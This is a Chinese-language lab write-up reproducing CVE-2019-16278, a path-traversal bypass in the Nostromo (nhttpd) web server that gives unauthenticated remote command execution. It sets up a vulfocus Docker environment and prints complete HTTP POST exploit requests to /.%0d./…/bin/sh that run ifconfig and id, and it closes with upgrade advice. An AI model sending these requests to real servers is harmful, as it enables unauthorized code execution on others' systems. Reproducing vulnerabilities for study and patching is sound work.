漏洞名称
影响版本
Nostromo web(又名nhttpd),这是一个开源的web服务,在Unix系统上非常流行,例如FreeBSD, OpenBSD等。
Nostromo由于在验证URL安全性方面存在缺陷,导致目录穿越,任何人都可以遍历系统中任何文件。因此未经过身份验证的远程攻击者可以强制服务器指向/bin/sh这样的shell文件,借此执行任意命令。 在CVE-2011-0751中攻击者可以通过/…%2f…%2f…%2fbin/sh来实现路径穿越,而后官方修复了该漏洞,CVE-2019-16278是对CVE-2011-0751的绕过,使用/.%0d./.%0d./.%0d./ 绕过对路径穿越的限制。
影响版本
Nostromo web<=1.9.6
漏洞复现
环境搭建
受害者IP:192.168.63.129:53342
攻击者IP:192.168.63.1
vulfocus下载链接
https://github.com/fofapro/vulfocus
git clone https://github.com/fofapro/vulfocus.git
启动vulfocus
docker-compose up -d
环境启动后,访问http://192.168.63.129:53342即可看到一个Nostromo页面,说明已成功启动。
漏洞利用
利用POST方式访问/.%0d./.%0d./.%0d./.%0d./bin/sh或者/.%0d./.%0d./.%0d./.%0d./bin/bash,取决于开启这个服务的用户权限。再传入post参数进行命令执行。
POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0
Host: 192.168.63.129:57565
Content-Length: 26
echo
echo
ifconfig 2>&1
更换执行命令id,发现返回报错
POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0
Host: 192.168.63.129:57565
Content-Length: 19
echo
echo
id 2>&1
根据成功执行的ifconfig和返回错误执行的id,分析错误和成功的hex包,发现主要差别在于两个echo后多了个0d换行
将echo后的0d换行,换成00,再次执行
注意点:http版本协议为1.0
修复建议
1、升级至最新版本1.9.7
http://www.nazgul.ch/dev/nostromo-1.9.7.tar.gz
总结
请求体的意思是先输出两个空行,然后尝试执行系统命令id,并将可能产生的任何错误信息与正常的命令输出一起显示。如果攻击成功,在响应头中返回状态码为200,且在响应体中返回uid,gid。
